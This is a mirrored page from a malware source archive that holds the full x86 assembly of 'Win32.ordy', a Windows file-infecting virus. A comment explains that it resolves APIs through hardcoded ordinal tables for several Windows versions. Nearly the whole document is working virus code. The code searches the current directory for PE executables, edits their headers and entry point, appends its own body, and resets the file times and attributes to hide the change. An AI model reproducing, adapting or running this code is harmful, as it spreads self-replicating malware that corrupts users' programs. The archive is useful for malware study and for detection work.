mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 01:58:51 +00:00
429 lines
12 KiB
NASM
429 lines
12 KiB
NASM
|
|
||
|
comment "
|
||
|
Win32.ordy by mort[MATRiX]
|
||
|
- simple direct action current dir last section PE appender
|
||
|
- using ordinal API values to access API
|
||
|
|
||
|
Well, in viriis there's mostly use some stuff to find APIs no matter
|
||
|
of kernel32.dll type,... I use APIs' ordinal values to access APIs.
|
||
|
API's address is counted right before it's used,...
|
||
|
When i searched for this values in different versions of widows,
|
||
|
i found they differ, so i included all ord values i was able to find.
|
||
|
U find them in ord.zip file in tools section.
|
||
|
I cant test thiss virii on all windoze versions. This one seems to be
|
||
|
good under win2k, anyway if u wanna run it under another, recheck
|
||
|
API's count,...
|
||
|
|
||
|
greetz All who helped me to create ordinal log
|
||
|
MiCr0s0fT - i founded my CreateFileA API DF sensitive,...
|
||
|
r there more? :)))
|
||
|
"
|
||
|
|
||
|
|
||
|
.486
|
||
|
.model flat,stdcall
|
||
|
|
||
|
extrn ExitProcess : proc
|
||
|
extrn MessageBoxA : proc
|
||
|
|
||
|
filetime struc
|
||
|
FT_dwLowDateTime dd ?
|
||
|
FT_dwHighDateTime dd ?
|
||
|
filetime ends
|
||
|
fileSearch struc
|
||
|
FileAttributes dd ?
|
||
|
CreationTime filetime ?
|
||
|
LastAccessTime filetime ?
|
||
|
LastWriteTime filetime ?
|
||
|
FileSizeHigh dd ?
|
||
|
FileSizeLow dd ?
|
||
|
Reserved0 dd ?
|
||
|
Reserved1 dd ?
|
||
|
FileName db 0260h dup(?)
|
||
|
AlternateFileName db 13 dup(?)
|
||
|
db 3 dup(?)
|
||
|
fileSearch ends
|
||
|
|
||
|
_vSize = ((@retAdd - @ordy) / 0200h + 1) * 0200h
|
||
|
_DEBUG = 0
|
||
|
|
||
|
.data
|
||
|
dd ?
|
||
|
|
||
|
.code
|
||
|
@ordy:
|
||
|
mov eax,@retAdd - @ordy
|
||
|
push offset @retAdd
|
||
|
_retAddress equ $ - 4
|
||
|
|
||
|
pushad
|
||
|
call @SEH
|
||
|
|
||
|
add esp,8
|
||
|
mov esp,[esp]
|
||
|
pop dword ptr fs:[0]
|
||
|
pop eax
|
||
|
popad
|
||
|
ret
|
||
|
|
||
|
if _DEBUG
|
||
|
db 01000h dup(0) ;coz of debug symbols,...:(
|
||
|
endif
|
||
|
|
||
|
@SEH:
|
||
|
push dword ptr fs:[0]
|
||
|
mov dword ptr fs:[0],esp
|
||
|
|
||
|
xor eax,eax
|
||
|
call @findKernel
|
||
|
@delta label
|
||
|
|
||
|
mov ebp,[esp - 4] ;get delta handle
|
||
|
|
||
|
mov [ebp + _kBase - @delta],eax
|
||
|
|
||
|
mov ebx,eax ;get kernel values,...
|
||
|
add eax,dword ptr [eax + 03ch]
|
||
|
add eax,078h
|
||
|
mov eax,[eax]
|
||
|
add eax,ebx
|
||
|
add eax,018h
|
||
|
xchg eax,esi
|
||
|
lodsd
|
||
|
push eax
|
||
|
lodsd
|
||
|
add eax,ebx
|
||
|
mov [ebp + _addBase - @delta],eax
|
||
|
pop eax
|
||
|
|
||
|
lea edi,[ebp + _ordinals - @delta - (_ordEnd - _ordStart - 2)]
|
||
|
|
||
|
@nextOrdinal:
|
||
|
add edi,(_ordEnd - _ordStart) - 2
|
||
|
scasw
|
||
|
jnz @nextOrdinal
|
||
|
mov [ebp + _ordinalBase - @delta],edi
|
||
|
|
||
|
push 02000h
|
||
|
push 040h
|
||
|
mov eax,_GlobalAlloc
|
||
|
call @callAPI
|
||
|
push eax ;for GlobalFree
|
||
|
|
||
|
push eax
|
||
|
call @mask
|
||
|
db '*.*',0
|
||
|
@mask:
|
||
|
mov eax,_FindFirstFileA
|
||
|
call @callAPI
|
||
|
xchg eax,esi
|
||
|
|
||
|
@examine:
|
||
|
mov eax,[esp]
|
||
|
mov al,byte ptr [eax + FileAttributes]
|
||
|
and al,010h
|
||
|
cmp al,010h
|
||
|
jnz @fileFounded
|
||
|
|
||
|
@nextFile:
|
||
|
push dword ptr [esp]
|
||
|
push esi
|
||
|
mov eax,_FindNextFileA
|
||
|
call @callAPI
|
||
|
dec eax
|
||
|
jz @examine
|
||
|
|
||
|
mov eax,_GlobalFree
|
||
|
call @callAPI
|
||
|
|
||
|
xor eax,eax
|
||
|
sub eax,[esp + 030h] ;cause exception
|
||
|
|
||
|
@findKernel:
|
||
|
add eax,[esp + 030h]
|
||
|
and eax,0fffff000h
|
||
|
|
||
|
@nextPage:
|
||
|
sub eax,01000h
|
||
|
cmp word ptr [eax],'ZM'
|
||
|
jnz @nextPage
|
||
|
ret
|
||
|
;------------------------------------------------------------------------
|
||
|
@rw:
|
||
|
; edi - file handle
|
||
|
; eax - ReadFile/WriteFile
|
||
|
; edx - buffer
|
||
|
; ecx - size
|
||
|
|
||
|
pushad
|
||
|
push 0
|
||
|
call @fw
|
||
|
dd ?
|
||
|
@fw:
|
||
|
push ecx edx edi
|
||
|
call @callAPI
|
||
|
popad
|
||
|
ret
|
||
|
|
||
|
;------------------------------------------------------------------------
|
||
|
@fileFounded:
|
||
|
if _DEBUG
|
||
|
mov eax,[esp]
|
||
|
cmp dword ptr [eax + FileName],'SOHG'
|
||
|
jz @oki
|
||
|
jmp @nextFile
|
||
|
@oki:
|
||
|
endif
|
||
|
|
||
|
mov ebx,[esp]
|
||
|
mov eax,[ebx + FileSizeLow]
|
||
|
cmp eax,04000h
|
||
|
jb @nextFile
|
||
|
|
||
|
mov eax,dword ptr [ebx + FileName]
|
||
|
and dword ptr [ebx + LastWriteTime],eax
|
||
|
jz @nextFile
|
||
|
or dword ptr [ebx + LastWriteTime],eax
|
||
|
|
||
|
mov edx,_ReadFile
|
||
|
xchg eax,ebx
|
||
|
add eax,01000h
|
||
|
xchg eax,edx
|
||
|
call @openRW
|
||
|
|
||
|
push edx
|
||
|
push edi
|
||
|
mov eax,_CloseHandle
|
||
|
call @callAPI
|
||
|
|
||
|
pop edx
|
||
|
|
||
|
cld
|
||
|
mov edi,edx
|
||
|
mov eax,'EPZM'
|
||
|
scasw
|
||
|
jnz @nextFile
|
||
|
shr eax,010h
|
||
|
std
|
||
|
add edi,dword ptr [edi + 03ah]
|
||
|
scasw
|
||
|
scasw
|
||
|
jnz @nextFile
|
||
|
|
||
|
mov eax,[edi + 076h]
|
||
|
shl eax,3
|
||
|
add eax,052h
|
||
|
xchg eax,ebx
|
||
|
movzx eax,word ptr [edi + 8]
|
||
|
imul eax,028h
|
||
|
xadd ebx,eax
|
||
|
|
||
|
mov eax,_vSize
|
||
|
add [edi + 052h],eax ;add imagesize
|
||
|
xadd [ebx + edi + 010h],eax ;eax - old size
|
||
|
push eax
|
||
|
add eax,[ebx + edi + 014h] ;add phys. offset
|
||
|
mov [ebp + _virBodyPofs - @delta],eax
|
||
|
pop eax
|
||
|
add eax,[ebx + edi + 0ch]
|
||
|
xchg eax,[edi + 02ah] ;set/get entrypoint
|
||
|
add eax,[edi + 036h]
|
||
|
mov [ebp + _retAddress - @delta],eax ;set it,...
|
||
|
add dword ptr [ebx + edi + 08h],01000h ;add virtual size
|
||
|
or dword ptr [ebx + edi + 024h],0a0000020h
|
||
|
|
||
|
lea eax,[ebp + @finalInfection - @delta]
|
||
|
push eax
|
||
|
mov eax,_WriteFile
|
||
|
|
||
|
@openRW:
|
||
|
mov ecx,01000h
|
||
|
|
||
|
cld ;coz of CreateFileA DF sensitivity,...:)))
|
||
|
call @open
|
||
|
call @rw
|
||
|
ret
|
||
|
|
||
|
;------------------------------------------------------------------------
|
||
|
@setA:
|
||
|
push ebx
|
||
|
push eax
|
||
|
mov eax,_SetFileAttributesA
|
||
|
call @callAPI
|
||
|
ret
|
||
|
|
||
|
;-----------------------------------------------------------------------
|
||
|
_CloseHandle = 0 ;API handles
|
||
|
_CreateFileA = 2
|
||
|
_GlobalAlloc = 4
|
||
|
_GlobalFree = 6
|
||
|
_WriteFile = 8
|
||
|
_ReadFile = 0ah
|
||
|
_FindFirstFileA = 0ch
|
||
|
_FindNextFileA = 0eh
|
||
|
_SetEndOfFile = 010h
|
||
|
_SetFileTime = 012h
|
||
|
_SetFileAttributesA = 014h
|
||
|
|
||
|
_ordSize equ _ordEnd - _ordStart
|
||
|
;shl 2
|
||
|
_ordinals label
|
||
|
|
||
|
_ordStart label
|
||
|
_ordinals95 label
|
||
|
dw 0682 ;APIs num
|
||
|
dw 088h * 4 ;CloseHandle
|
||
|
dw 09dh * 4 ;CreateFileA
|
||
|
dw 01b5h * 4 ;GlobalAlloc
|
||
|
dw 01bch * 4 ;GlobalFree
|
||
|
dw 02e3h * 4 ;WriteFile
|
||
|
dw 0242h * 4 ;ReadFile
|
||
|
dw 0f9h * 4 ;FindFirstFileA
|
||
|
dw 0fch * 4 ;FindNextFile
|
||
|
dw 0281h * 4 ;SetEndOfFile
|
||
|
dw 028bh * 4 ;SetFileTime
|
||
|
dw 0288h * 4 ;SetFileAttributesA
|
||
|
_ordEnd label
|
||
|
|
||
|
_ordinals98 label ;(r1,SE)
|
||
|
dw 0745 ;APIs num
|
||
|
dw 09fh * 4 ;CloseHandle
|
||
|
dw 0b8h * 4 ;CreateFileA
|
||
|
dw 01e5h * 4 ;GlobalAlloc
|
||
|
dw 01ech * 4 ;GlobalFree
|
||
|
dw 0335h * 4 ;WriteFile
|
||
|
dw 027dh * 4 ;ReadFile
|
||
|
dw 011bh * 4 ;FindFirstFileA
|
||
|
dw 0120h * 4 ;FindNextFile
|
||
|
dw 02c5h * 4 ;SetEndOfFile
|
||
|
dw 02cfh * 4 ;SetFileTime
|
||
|
dw 02cch * 4 ;SetFileAttributesA
|
||
|
|
||
|
_ordinalsNT label
|
||
|
dw 02a1h ;APIs num
|
||
|
dw 018h * 4 ;CloseHandle
|
||
|
dw 031h * 4 ;CreateFileA
|
||
|
dw 0155h * 4 ;GlobalAlloc
|
||
|
dw 015ch * 4 ;GlobalFree
|
||
|
dw 027bh * 4 ;WriteFile
|
||
|
dw 01d6h * 4 ;ReadFile
|
||
|
dw 082h * 4 ;FindFirstFileA
|
||
|
dw 087h * 4 ;FindNextFile
|
||
|
dw 0210h * 4 ;SetEndOfFile
|
||
|
dw 021ah * 4 ;SetFileTime
|
||
|
dw 0217h * 4 ;SetFileAttributesA
|
||
|
|
||
|
_ordinals2k label
|
||
|
dw 0337h ;APIs num
|
||
|
dw 01eh * 4 ;CloseHandle
|
||
|
dw 037h * 4 ;CreateFileA
|
||
|
dw 019ch * 4 ;GlobalAlloc
|
||
|
dw 01a3h * 4 ;GlobalFree
|
||
|
dw 030eh * 4 ;WriteFile
|
||
|
dw 023dh * 4 ;ReadFile
|
||
|
dw 0a3h * 4 ;FindFirstFileA
|
||
|
dw 0ach * 4 ;FindNextFile
|
||
|
dw 028ch * 4 ;SetEndOfFile
|
||
|
dw 0297h * 4 ;SetFileTime
|
||
|
dw 0293h * 4 ;SetFileAttributesA
|
||
|
|
||
|
;------------------------------------------------------------------------
|
||
|
@open:
|
||
|
;eax - filename
|
||
|
pushad
|
||
|
mov eax,[esp + 028h]
|
||
|
add eax,FileName
|
||
|
push 0 0 3 0 1
|
||
|
push 080000000h or 040000000h
|
||
|
push eax
|
||
|
|
||
|
mov ebx,020h
|
||
|
call @setA
|
||
|
|
||
|
mov eax,_CreateFileA
|
||
|
call @callAPI
|
||
|
mov [esp],eax ;handle to edi
|
||
|
popad
|
||
|
ret
|
||
|
|
||
|
;-------------------------------------------------------
|
||
|
;eax - API handle
|
||
|
@callAPI:
|
||
|
pop edi
|
||
|
add eax,012345678h
|
||
|
_ordinalBase equ $ - 4
|
||
|
movzx eax,word ptr [eax]
|
||
|
add eax,012345678h
|
||
|
_addBase equ $ - 4
|
||
|
mov eax,[eax]
|
||
|
add eax,012345678h
|
||
|
_kBase equ $ - 4
|
||
|
call eax
|
||
|
jmp edi
|
||
|
;----------------------------------------------------------------
|
||
|
@finalInfection:
|
||
|
mov eax,012345678h
|
||
|
_virBodyPofs equ $ - 4
|
||
|
sub eax,01000h
|
||
|
push eax
|
||
|
mov eax,_ReadFile
|
||
|
xor ecx,ecx
|
||
|
inc ecx
|
||
|
|
||
|
@nextByte2Seek:
|
||
|
call @rw
|
||
|
dec dword ptr [esp]
|
||
|
jnz @nextByte2Seek
|
||
|
pop eax
|
||
|
|
||
|
mov ecx,_vSize
|
||
|
lea edx,[ebp + @ordy - @delta]
|
||
|
add eax,_WriteFile
|
||
|
call @rw
|
||
|
|
||
|
push esi
|
||
|
|
||
|
push edi edi
|
||
|
mov eax,_SetEndOfFile
|
||
|
call @callAPI
|
||
|
|
||
|
mov ebx,[esp]
|
||
|
mov eax,[esp + 0ch]
|
||
|
add eax,LastWriteTime
|
||
|
push eax
|
||
|
sub eax,8
|
||
|
push eax
|
||
|
sub eax,8
|
||
|
push eax
|
||
|
push ebx
|
||
|
mov eax,_SetFileTime
|
||
|
call @callAPI
|
||
|
|
||
|
mov eax,_CloseHandle
|
||
|
call @callAPI
|
||
|
|
||
|
mov ebx,[esp + 4]
|
||
|
mov eax,[ebx + FileAttributes]
|
||
|
xchg eax,ebx
|
||
|
add eax,FileName
|
||
|
call @setA
|
||
|
|
||
|
pop esi ;restore search handle
|
||
|
|
||
|
@fuckFile:
|
||
|
jmp @nextFile
|
||
|
|
||
|
@retAdd:
|
||
|
push 0
|
||
|
call @title
|
||
|
db '.ordy by mort[MATRiX]',0
|
||
|
@title:
|
||
|
call @mess
|
||
|
db 'hey guys, CreateFileA API is DF sensitive!!! :)))',0
|
||
|
@mess:
|
||
|
push 0
|
||
|
call MessageBoxA
|
||
|
call ExitProcess,0
|
||
|
ret
|
||
|
end @ordy
|